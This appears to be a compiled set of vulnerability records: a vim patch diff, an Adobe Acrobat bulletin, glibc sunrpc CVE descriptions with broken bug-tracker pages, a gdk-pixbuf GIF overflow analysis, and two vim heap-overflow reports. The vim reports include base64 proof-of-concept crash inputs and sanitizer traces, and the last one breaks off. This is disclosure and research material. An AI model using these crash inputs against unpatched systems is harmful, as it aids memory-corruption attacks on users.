Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.

@@ -536,24 +536,29 @@ block\_insert(

if (b\_insert)

{

off = (\*mb\_head\_off)(oldp, oldp + offset + spaces);

spaces -= off;

count -= off;

}

else

{

off = (\*mb\_off\_next)(oldp, oldp + offset);

offset += off;

// spaces fill the gap, the character that's at the edge moves

// right

off = (\*mb\_head\_off)(oldp, oldp + offset);

offset -= off;

}

spaces -= off;

count -= off;

}

if (spaces < 0) // can happen when the cursor was moved

spaces = 0;

  

newp = alloc(STRLEN(oldp) + s\_len + count + 1);

// Make sure the allocated size matches what is actually copied below.

newp = alloc(STRLEN(oldp) + spaces + s\_len

\+ (spaces > 0 && !bdp->is\_short ? ts\_val - spaces : 0)

\+ count + 1);

if (newp == NULL)

continue;

  

// copy up to shifted part

mch\_memmove(newp, oldp, (size\_t)(offset));

mch\_memmove(newp, oldp, (size\_t)offset);

oldp += offset;

  

// insert pre-padding

@@ -564,14 +569,21 @@ block\_insert(

mch\_memmove(newp + startcol, s, (size\_t)s\_len);

offset += s\_len;

  

if (spaces && !bdp->is\_short)

if (spaces \> 0 && !bdp->is\_short)

{

// insert post-padding

vim\_memset(newp + offset + spaces, ' ', (size\_t)(ts\_val - spaces));

// We're splitting a TAB, don't copy it.

oldp++;

// We allowed for that TAB, remember this now

count++;

if (\*oldp == TAB)

{

// insert post-padding

vim\_memset(newp + offset + spaces, ' ',

(size\_t)(ts\_val - spaces));

// we're splitting a TAB, don't copy it

oldp++;

// We allowed for that TAB, remember this now

count++;

}

else

// Not a TAB, no extra spaces

count = spaces;

}

  

if (spaces > 0)

@@ -1598,7 +1610,7 @@ op\_insert(oparg\_T \*oap, long count1)

oap->start\_vcol = t;

}

else if (oap->op\_type == OP\_APPEND

&& oap->end.col + oap->end.coladd

&& oap->start.col + oap->start.coladd

\>= curbuf->b\_op\_start\_orig.col

\+ curbuf->b\_op\_start\_orig.coladd)

{

CVE-2022-0261: patch 8.2.4120: block insert goes over the end of the line · vim/vim@9f8c304

Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by a use-after-free vulnerability in the processing of Format event actions that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Security update available for Adobe Acrobat and Reader  | APSB22-01

**Bulletin ID**

**Date Published**

**Priority**

APSB22-01

January 11, 2022

2

**Summary**

Adobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address  multiple critical, important and moderate vulnerabilities. Successful exploitation could lead to arbitrary code execution, memory leak, application denial of service,  security feature bypass and privilege escalation. 

**Affected Versions**

**Product**

**Track**

**Affected Versions**

**Platform**

Acrobat DC 

Continuous 

21.007.20099 and earlier versions  

Windows

Acrobat Reader DC

Continuous 

21.007.20099 and earlier versions

Windows

Acrobat DC 

Continuous 

21.007.20099 and earlier versions

macOS

Acrobat Reader DC

Continuous 

21.007.20099 and earlier versions

macOS

Acrobat 2020  

Classic 2020             

20.004.30017 and earlier versions  

Windows & macOS  

Acrobat Reader 2020  

Classic 2020             

20.004.30017 and earlier versions   

Windows & macOS  

Acrobat 2017

Classic 2017

17.011.30204  and earlier versions            

Windows & macOS  

Acrobat Reader 2017

Classic 2017

17.011.30204  and earlier versions        

Windows & macOS  

For questions regarding Acrobat DC, please visit the Acrobat DC FAQ page. 

**Solution**

Adobe recommends users update their software installations to the latest versions by following the instructions below.    

The latest product versions are available to end users via one of the following methods:    

*   Users can update their product installations manually by choosing Help > Check for Updates.     
    
*   The products will update automatically, without requiring user intervention, when updates are detected.      
    
*   The full Acrobat Reader installer can be downloaded from the Acrobat Reader Download Center.     
    

For IT administrators (managed environments):     

*   Refer to the specific release note version for links to installers.     
    
*   Install updates via your preferred methodology, such as AIP-GPO, bootstrapper, SCUP/SCCM (Windows), or on macOS, Apple Remote Desktop and SSH.     
    

Adobe categorizes these updates with the following priority ratings and recommends users update their installation to the newest version:    

**Product**

**Track**

**Updated Versions**

**Platform**

**Priority Rating**

**Availability**

Acrobat DC

Continuous

21.011.20039  

Windows and macOS

2

Release Notes     

Acrobat Reader DC

Continuous

21.011.20039  

Windows and macOS

2

Release Notes     

Acrobat 2020  

Classic 2020             

20.004.30020  

Windows and macOS       

2

Release Notes     

Acrobat Reader 2020  

Classic 2020             

20.004.30020  

Windows and macOS       

2

Release Notes     

Acrobat 2017

Classic 2017

17.011.30207  

Windows and macOS

2

Release Notes     

Acrobat Reader 2017

Classic 2017

17.011.30207  

Windows and macOS

2

Release Notes     

**Vulnerability Details**

**Vulnerability Category**

**Vulnerability Impact**

**Severity**

**CVSS base score**

CVSS vector

**CVE Number**

Use After Free (CWE-416)

Arbitrary code execution 

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44701

Information Exposure (CWE-200)  

Privilege escalation

Moderate

3.1

CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N  

CVE-2021-44702

Stack-based Buffer Overflow (CWE-121)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44703

Use After Free (CWE-416)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44704

Access of Uninitialized Pointer (CWE-824)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44705

Use After Free (CWE-416)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44706

Out-of-bounds Write (CWE-787)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44707

Heap-based Buffer Overflow (CWE-122)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44708

Heap-based Buffer Overflow (CWE-122)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44709

Use After Free (CWE-416)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44710

Integer Overflow or Wraparound (CWE-190)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44711

Improper Input Validation (CWE-20)

Application denial-of-service

Important

4.4

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L

CVE-2021-44712

Use After Free (CWE-416)

Application denial-of-service

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

CVE-2021-44713

Violation of Secure Design Principles (CWE-657)

Security feature bypass

Moderate

2.5

CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N

CVE-2021-44714

Out-of-bounds Read (CWE-125)

Memory Leak

Moderate

3.3

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

CVE-2021-44715

Information Exposure (CWE-200)  

Privilege escalation  

Moderate

3.1

CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N  

CVE-2021-44739

NULL Pointer Dereference (CWE-476)

Application denial-of-service

Moderate

3.3

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

CVE-2021-44740

NULL Pointer Dereference (CWE-476)

Application denial-of-service

Moderate

3.3

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

CVE-2021-44741

Out-of-bounds Read (CWE-125)

Memory Leak

Moderate

3.3

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

CVE-2021-44742

Out-of-bounds Read (CWE-125)

Arbitrary code execution

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-45060

Out-of-bounds Write (CWE-787)

Arbitrary code execution

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-45061

Use After Free (CWE-416)

Arbitrary code execution

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-45062

Use After Free (CWE-416)

Privilege escalation

Moderate

3.3

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

CVE-2021-45063

Use After Free (CWE-416)

Arbitrary code execution

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-45064

Access of Memory Location After End of Buffer (CWE-788)

Memory Leak

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

CVE-2021-45067

Out-of-bounds Write (CWE-787)

Arbitrary code execution

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-45068

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2022-24092  

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2022-24091

**Acknowledgements**

Adobe would like to thank the following for reporting these issues and for working with Adobe to help protect our customers:   

*   Ashfaq Ansari and Krishnakant Patil - HackSys Inc working with Trend Micro Zero Day Initiative (CVE-2021-44701)
*   j00sean (j00sean) (CVE-2021-44702, CVE-2021-44739)
*   Kai Lu of Zscaler's ThreatLabz (CVE-2021-44703, CVE-2021-44708, CVE-2021-44709, CVE-2021-44740, CVE-2021-44741)
*   PangU via TianfuCup (CVE-2021-44704)
*   StakLeader via TianfuCup and Mat Powell of Trend Micro Zero Day Initiative (CVE-2021-44705)
*   bee13oy of Kunlun Lab via TianfuCup (CVE-2021-44706)
*   Vulnerability Research Institute Juvenile Via TianfuCup and Mat Powell of Trend Micro Zero Day Initiative  
    (CVE-2021-44707)
*   Jaewon Min and Aleksandar Nikolic of Cisco Talos (CVE-2021-44710, CVE-2021-44711)
*   Sanjeev Das (sd001) (CVE-2021-44712)  
    
*   Rocco Calvi (TecR0c) and Steven Seeley of Qihoo 360 (CVE-2021-44713, CVE-2021-44715)
*   chamal (chamal) (CVE-2021-44714)
*   fr0zenrain of Baidu Security (fr0zenrain) (CVE-2021-44742)  
    
*   Anonymous working with Trend Micro Zero Day Initiative (CVE-2021-45060, CVE-2021-45061, CVE-2021-45062, CVE-2021-45063; CVE-2021-45068, CVE-2021-45064)
*   Ashfaq Ansari and Krishnakant Patil - HackSys Inc (CVE-2021-45067)
*   Mat Powell of Trend Micro Zero Day Initiative (CVE-2022-24092, CVE-2022-24091)

**Revisions:**

January 12, 2022: Updated acknowledgement for CVE-2021-44706

January 13, 2022: Updated acknowledgement for CVE-2021-45064, Updated CVE details for CVE-2021-44702 and CVE-2021-44739

January 17, 2022: Updated acknowledgement for CVE-2021-44706  
January 27th, 2022: Updated acknowledgment for CVE-2021-45067

March 16, 2022: Added CVE details for CVE-2022-24091 and CVE-2022-24092

March 24, 2022: Updated acknowledgements for CVE-2022-44705 and CVE-2022-44707

For more information, visit https://helpx.adobe.com/security.html, or email PSIRT@adobe.com.

CVE-2021-44705: Adobe Security Bulletin

vim is vulnerable to Heap-based Buffer Overflow

**Description**

A Heap-based Buffer Overflow has been found in vim commit 3cf21b3

**Proof of Concept**

    base64 poc
    ZggwMDAwMDAwMDAwMDAwMDAwMBkwMDAwCmYIMDAwMDAwMCUlJSUlJSUlJSUlMDAwMDD8CmUlJSUl
    JSUlJSUlJSUlJQp2cwp2MP8wbwo=
    

    ~/fuzzing/vim/vim/src/vim  -u NONE -X -Z -e -s -S ./poc -c :qa!
    

ASan stack trace:

    =================================================================
    ==1771749==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62100000c500 at pc 0x000000430759 bp 0x7fff2b54f4d0 sp 0x7fff2b54ec90
    READ of size 1 at 0x62100000c500 thread T0
        #0 0x430758 in strlen (/home/aidai/fuzzing/vim/vim/src/vim+0x430758)
        #1 0x5dfe7d in win_redr_status /home/aidai/fuzzing/vim/vim/src/drawscreen.c:496:18
        #2 0x5e6c60 in redraw_statuslines /home/aidai/fuzzing/vim/vim/src/drawscreen.c:3243:6
        #3 0xf70031 in main_loop /home/aidai/fuzzing/vim/vim/src/main.c:1401:6
        #4 0x707866 in do_exedit /home/aidai/fuzzing/vim/vim/src/ex_docmd.c:6967:3
        #5 0x715673 in ex_open /home/aidai/fuzzing/vim/vim/src/ex_docmd.c:6902:5
        #6 0x6e9395 in do_one_cmd /home/aidai/fuzzing/vim/vim/src/ex_docmd.c:2573:2
        #7 0x6dc217 in do_cmdline /home/aidai/fuzzing/vim/vim/src/ex_docmd.c:993:17
        #8 0x6cf415 in global_exe_one /home/aidai/fuzzing/vim/vim/src/ex_cmds.c
        #9 0x6cf87e in global_exe /home/aidai/fuzzing/vim/vim/src/ex_cmds.c:5045:2
        #10 0x6cecac in ex_global /home/aidai/fuzzing/vim/vim/src/ex_cmds.c:5006:6
        #11 0x6e9395 in do_one_cmd /home/aidai/fuzzing/vim/vim/src/ex_docmd.c:2573:2
        #12 0x6dc217 in do_cmdline /home/aidai/fuzzing/vim/vim/src/ex_docmd.c:993:17
        #13 0xb6bec7 in do_source /home/aidai/fuzzing/vim/vim/src/scriptfile.c:1511:5
        #14 0xb6a05f in cmd_source /home/aidai/fuzzing/vim/vim/src/scriptfile.c:1098:14
        #15 0x6e9395 in do_one_cmd /home/aidai/fuzzing/vim/vim/src/ex_docmd.c:2573:2
        #16 0x6dc217 in do_cmdline /home/aidai/fuzzing/vim/vim/src/ex_docmd.c:993:17
        #17 0xf6d3b3 in exe_commands /home/aidai/fuzzing/vim/vim/src/main.c:3084:2
        #18 0xf6d3b3 in vim_main2 /home/aidai/fuzzing/vim/vim/src/main.c:774:2
        #19 0xf69bdf in main /home/aidai/fuzzing/vim/vim/src/main.c:426:12
        #20 0x7f8ccafc20b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
        #21 0x41db2d in _start (/home/aidai/fuzzing/vim/vim/src/vim+0x41db2d)
    
    0x62100000c500 is located 0 bytes to the right of 4096-byte region [0x62100000b500,0x62100000c500)
    allocated by thread T0 here:
        #0 0x49626d in malloc (/home/aidai/fuzzing/vim/vim/src/vim+0x49626d)
        #1 0x4c5d75 in lalloc /home/aidai/fuzzing/vim/vim/src/alloc.c:248:11
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/aidai/fuzzing/vim/vim/src/vim+0x430758) in strlen
    Shadow bytes around the buggy address:
      0x0c427fff9850: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c427fff9860: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c427fff9870: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c427fff9880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c427fff9890: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c427fff98a0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff98b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff98c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff98d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff98e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff98f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==1771749==ABORTING

CVE-2022-0213: Heap-based Buffer Overflow in vim

The deprecated compatibility function clnt_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its hostname argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) arbitrary code execution.

'22542?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2022-23219: Invalid Bug ID

The deprecated compatibility function svcunix_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its path argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) arbitrary code execution.

'28768?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2022-23218: Invalid Bug ID

GNOME gdk-pixbuf 2.42.6 is vulnerable to a heap-buffer overflow vulnerability when decoding the lzw compressed stream of image data in GIF files with lzw minimum code size equals to 12.

**Summary**

The GdkPixbuf library is vulnerable to heap-buffer overflow vulnerability when decoding the lzw compressed stream of image data in GIF files with lzw minimum code size equals to 12.

**Technical Analysis**

When parsing the Image Data section of GIF files with lzw minimum code size equals to 12, the library miscalculates the maximum indexes the LZWDecoder->code_table can have, overwriting the LZWDecoder->code_table_size in _LZWDecoder structure.

In the following code snippets, we can observe that the LZW\_CODE\_MAX is set to 12 at line:28 in gdk-pixbuf/lzw.h which when left shifted at line:22 in gdk-pixbuf/lzw.c will yield MAX\_CODES value to 4096. This means that the LZW decoding operations ideally should always write to maximum 4096 indexes of LZWDecoder->code\_table.

file gdk-pixbif/lzw.h

    27:/* Maximum code size in bits */
    28:#define LZW_CODE_MAX 12

file: gdk-pixbuf/lzw.c

    21:/* Maximum number of codes */
    22:#define MAX_CODES (1 << LZW_CODE_MAX)
    23:
    24:typedef struct
    25:{
    26:        /* Last index this code represents */
    27:        guint8 index;
    28:
    29:        /* Codeword of previous index or the EOI code if doesn't extend */
    30:        guint16 extends;
    31:} LZWCode;
    32:
    33:struct _LZWDecoder
    34:{
    35:        GObject parent_instance;
    36:
    37:        /* Initial code size */
    38:        int min_code_size;
    39:
    40:        /* Current code size */
    41:        int code_size;
    42:
    43:        /* Code table and special codes */
    44:        int clear_code;
    45:        int eoi_code;
    46:        LZWCode code_table[MAX_CODES];
    47:        int code_table_size;
    48:
    49:        /* Current code being assembled */
    50:        int code;
    51:        int code_bits;
    52:
    53:        /* Last code processed */
    54:        int last_code;
    55:};

The following code snippets shows that the library first initializes the lzw_decoder object by calling lzw_decoder_new function wih the user controlled frame->lzw_code_size value at line:339 in gdk-pixbuf/io-gif-animation.c.

When the value of frame->lzw_code_size is set to 12 (0xc), the lzw_decoder_new gets called with the code\_size value equals to 13, which ultimately sets the value of self->eoi_code (end of information) to 4097 at line:131 in gdk-pixbuf/lzw.c, thus writing the values to overall 4098 indexes instead of predefined 4096 at line:133-137 in gdk-pixbuf/lzw.c.

file: gdk-pixbuf/io-gif-animation.c

    317:static void
    318:composite_frame (GdkPixbufGifAnim *anim, GdkPixbufFrame *frame)
    319:{
    320:        LZWDecoder *lzw_decoder = NULL;
    .
    .
    .
    338:
    339:        lzw_decoder = lzw_decoder_new (frame->lzw_code_size + 1);
    340:        index_buffer = g_new (guint8, frame->width * frame->height);

file: gdk-pixbuf/lzw.c

    118:LZWDecoder *
    119:lzw_decoder_new (guint8 code_size)
    120:{
    121:        LZWDecoder *self;
    122:        int i;
    123:
    124:        self = g_object_new (lzw_decoder_get_type (), NULL);
    125:
    126:        self->min_code_size = code_size;
    127:        self->code_size = code_size;
    128:
    129:        /* Add special clear and end of information codes */
    130:        self->clear_code = 1 << (code_size - 1);
    131:        self->eoi_code = self->clear_code + 1;
    132:
    133:        for (i = 0; i <= self->eoi_code; i++) {
    134:                self->code_table[i].index = i;
    135:                self->code_table[i].extends = self->eoi_code;
    136:                self->code_table_size++;
    137:        }
    138:
    139:        /* Start with an empty codeword following an implicit clear codeword */
    140:        self->code = 0;
    141:        self->last_code = self->clear_code;
    142:
    143:        return self;
    144:}

**Dynamic Analysis**

With the following gdb output, we can confirm that the lzw_decoder_new function writes to two more indexes than predefined 4096 indexes of LZWDecoder->code_table and thus overwrites the value of LZWDecoder->code_table_size from 4096 to 268505089.

    $43 = 4096
    $44 = (int *) 0x629000018228
    0x629000018228:	0x0000000000001000
    $45 = 4096
    
    Breakpoint 4, lzw_decoder_new (code_size=13 '\r') at ../gdk-pixbuf/lzw.c:134
    134	                self->code_table[i].index = i;
    (gdb) c
    Continuing.
    $46 = 4097
    $47 = (int *) 0x629000018228
    0x629000018228:	0x0000000010011001
    $48 = 268505089
    
    Breakpoint 4, lzw_decoder_new (code_size=13 '\r') at ../gdk-pixbuf/lzw.c:134
    134	                self->code_table[i].index = i;
    (gdb) c
    Continuing.
    $49 = 4098
    $50 = (int *) 0x629000018228
    0x629000018228:	0x1001000110011002
    $51 = 268505090
    
    Breakpoint 7, lzw_decoder_new (code_size=13 '\r') at ../gdk-pixbuf/lzw.c:140
    140	        self->code = 0;

**Steps to reproduce**

1.  Compile the gdk-pixbuf with address sanitizer.
2.  Execute the gdk-pixbuf/gdk-pixbuf-pixdata binary with the accompanied heap-buffer-overflow.gif file as follows and observed the ASAN dump:

command:

    ./gdk-pixbuf/gdk-pixbuf-pixdata ../../gdk-pixbuf/poc/heap_buffer_overflow.gif /tmp/bbbb

ASAN Dump:

    ==5565==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62900001336a at pc 0x00000053b142 bp 0x7fffc5dd1200 sp 0x7fffc5dd11f8
    READ of size 2 at 0x62900001336a thread T0
        #0 0x53b141 in write_indexes /root/gdk-pixbuf-poc/_build/../gdk-pixbuf/lzw.c:88:36
        #1 0x53a8d9 in lzw_decoder_feed /root/gdk-pixbuf-poc/_build/../gdk-pixbuf/lzw.c:212:46
        #2 0x5374c1 in composite_frame /root/gdk-pixbuf-poc/_build/../gdk-pixbuf/io-gif-animation.c:364:21
        #3 0x5351ed in gdk_pixbuf_gif_anim_iter_get_pixbuf /root/gdk-pixbuf-poc/_build/../gdk-pixbuf/io-gif-animation.c:421:17
        #4 0x5347bf in gdk_pixbuf_gif_anim_get_static_image /root/gdk-pixbuf-poc/_build/../gdk-pixbuf/io-gif-animation.c:117:16
        #5 0x58e217 in gdk_pixbuf_animation_get_static_image /root/gdk-pixbuf-poc/_build/../gdk-pixbuf/gdk-pixbuf-animation.c:586:16
        #6 0x532d08 in gif_get_lzw /root/gdk-pixbuf-poc/_build/../gdk-pixbuf/io-gif.c:522:24
        #7 0x52caf7 in gif_main_loop /root/gdk-pixbuf-poc/_build/../gdk-pixbuf/io-gif.c:821:13
        #8 0x52b370 in gdk_pixbuf__gif_image_load_increment /root/gdk-pixbuf-poc/_build/../gdk-pixbuf/io-gif.c:1013:11
        #9 0x503404 in gdk_pixbuf_loader_load_module /root/gdk-pixbuf-poc/_build/../gdk-pixbuf/gdk-pixbuf-loader.c:467:16
        #10 0x502127 in gdk_pixbuf_loader_close /root/gdk-pixbuf-poc/_build/../gdk-pixbuf/gdk-pixbuf-loader.c:835:25
        #11 0x581dbb in gdk_pixbuf__qtif_image_load /root/gdk-pixbuf-poc/_build/../gdk-pixbuf/io-qtif.c:217:21
        #12 0x4f47ec in _gdk_pixbuf_generic_image_load /root/gdk-pixbuf-poc/_build/../gdk-pixbuf/gdk-pixbuf-io.c:1064:26
        #13 0x4f502b in gdk_pixbuf_new_from_file /root/gdk-pixbuf-poc/_build/../gdk-pixbuf/gdk-pixbuf-io.c:1135:18
        #14 0x4efee7 in main /root/gdk-pixbuf-poc/_build/../gdk-pixbuf/gdk-pixbuf-pixdata.c:77:12
        #15 0x7fe6f0e7582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
        #16 0x41e518 in _start (/root/gdk-pixbuf-poc/_build/gdk-pixbuf/gdk-pixbuf-pixdata+0x41e518)
    
    0x62900001336a is located 306 bytes to the right of 16440-byte region [0x62900000f200,0x629000013238)
    allocated by thread T0 here:
        #0 0x4be648 in malloc (/root/gdk-pixbuf-poc/_build/gdk-pixbuf/gdk-pixbuf-pixdata+0x4be648)
        #1 0x7fe6f297e7b8 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4f7b8)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /root/gdk-pixbuf-poc/_build/../gdk-pixbuf/lzw.c:88:36 in write_indexes
    Shadow bytes around the buggy address:
      0x0c527fffa610: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c527fffa620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c527fffa630: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c527fffa640: 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa
      0x0c527fffa650: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    =>0x0c527fffa660: fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa fa
      0x0c527fffa670: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c527fffa680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c527fffa690: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c527fffa6a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c527fffa6b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Heap right redzone:      fb
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack partial redzone:   f4
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==5565==ABORTING

**Credits**

sahil.dhar@darkmatter.ae (xen1thlabs)

**POC File**

CVE-2021-44648: (CVE-2021-44648) GdkPixbuf Heap Buffer Overflow in lzw_decoder_new (#136) · Issues · GNOME / gdk-pixbuf · GitLab

**Description**

A Heap-based Buffer Overflow has been found in vim commit 2f0936c

**Proof of Concept**

    base64 poc
    ZGVmIEZpcnN0RnVuY3Rpb24oKQogIGRlZiBTZWNvbmRGdW5vbmUKJCAgCiAgIGVuZGRCQkJCCmVu
    ZGRlZgojIEN/////bGUgYWxsZWZ8QkJCQgplbmRkZWYKIyBDb21waWxlIGFsbCBmdW5jdGlvbnMK
    ZGVmY29tcGlsZQo=
    

    ~/fuzzing/vim/fuzz/bin/vim  -u NONE -X -Z -e -s -S ./poc -c :qa!
    

ASan stack trace:

    ~/fuzzing/vim/fuzz/bin/vim  -u NONE -X -Z -e -s -S ./poc -c :qa!
    =================================================================
    ==836524==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000622f at pc 0x0000004306f9 bp 0x7ffc883006f0 sp 0x7ffc882ffeb0
    READ of size 5 at 0x60200000622f thread T0
        #0 0x4306f8 in strlen (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x4306f8)
        #1 0xc444a6  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xc444a6)
        #2 0xf7515a  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xf7515a)
        #3 0xe1ba91  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe1ba91)
        #4 0xe14ca4  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe14ca4)
        #5 0xe14009  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe14009)
        #6 0xe12ddf  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe12ddf)
        #7 0xe12043  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe12043)
        #8 0xe0e863  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe0e863)
        #9 0xe0ffaa  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe0ffaa)
        #10 0xdaf709  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xdaf709)
        #11 0xdc68ed  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xdc68ed)
        #12 0xd92167  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xd92167)
        #13 0x6e68fe  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x6e68fe)
        #14 0x6d9b41  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x6d9b41)
        #15 0xb6680a  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xb6680a)
        #16 0xb6457f  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xb6457f)
        #17 0x6e68fe  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x6e68fe)
        #18 0x6d9b41  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x6d9b41)
        #19 0xf60f43  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xf60f43)
